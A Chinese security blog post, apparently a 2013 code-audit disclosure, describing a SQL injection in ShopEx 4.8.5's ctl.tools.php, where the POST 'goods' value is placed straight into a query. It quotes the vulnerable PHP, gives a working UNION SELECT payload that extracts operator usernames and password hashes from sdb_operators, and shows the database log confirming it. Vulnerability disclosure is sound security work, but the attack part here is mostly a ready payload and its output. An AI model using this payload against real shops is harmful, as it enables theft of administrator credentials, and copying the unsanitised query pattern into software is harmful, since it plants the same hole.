您的位置 » 首页 » 代码审计,实用工具 » 代码审计:shopex ctl.tools.php文件SQL注入漏洞

代码审计:shopex ctl.tools.php文件SQL注入漏洞

发表于3年前 | 作者: seay | 分类: 代码审计, 实用工具 | 孵化于:2013年08月17日 | 文章热度:10,313 次 全屏阅读

显示不全请点击全屏阅读

又是sql注入

测试版本:shopex-singel-4.8.5.78660

文件\core\shop\controller\ctl.tools.php

function products(){
        $objGoods  = &$this->system->loadModel('goods/products');
 
        $filter = array();
        foreach(explode(',',$_POST['goods']) as $gid){
            $filter['goods_id'][] = $gid;
         }
 
        $this->pagedata['products'] = $objGoods->getList($objGoods->defaultCols.',find_in_set(goods_id,"'.$_POST['goods'].'") as rank',$filter,0,-1,array('rank','asc'));
目测$_POST[‘goods’]直接进入到sql语句中,由于部分文件加密开启sql语句执行记录日志
 
提交:
goods=aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators%23
 
 
130526 20:03:23   352 Connect root@localhost on 
 352 Init DB shopex
 352 Query SET NAMES 'utf8'
 352 Query SELECT * FROM sdb_plugins WHERE plugin_type="app"
 352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='commodity_radar' LIMIT 0, 1
 352 Query select * from sdb_plugins where plugin_type="app" and plugin_ident='shopex_stat' LIMIT 0, 1
 352 Query SELECT count(goods_id) FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc
 352 Query SELECT bn,name,cat_id,price,store,marketable,brand_id,weight,d_order,uptime,type_id,supplier_id,find_in_set(goods_id,"aaa") FROM sdb_goods union select 1,concat(username,userpass),3,4,5,6,7,8,9,10,11,12,13 from sdb_operators#") as rank,goods_id,image_default,thumbnail_pic,brief,pdt_desc,mktprice,big_pic FROM sdb_goods WHERE goods_id IN (0,0,0,3,4,5,6,7,8,9,10,11,12,13) AND sdb_goods.disabled = 'false' AND sdb_goods.goods_type='normal' ORDER BY rank asc LIMIT 0, 18446744073709551615

查看日志变量已经进入到sql语句中 

作者:code_sec

Tags:

ShopEx漏洞, 代码审计,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/3305/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)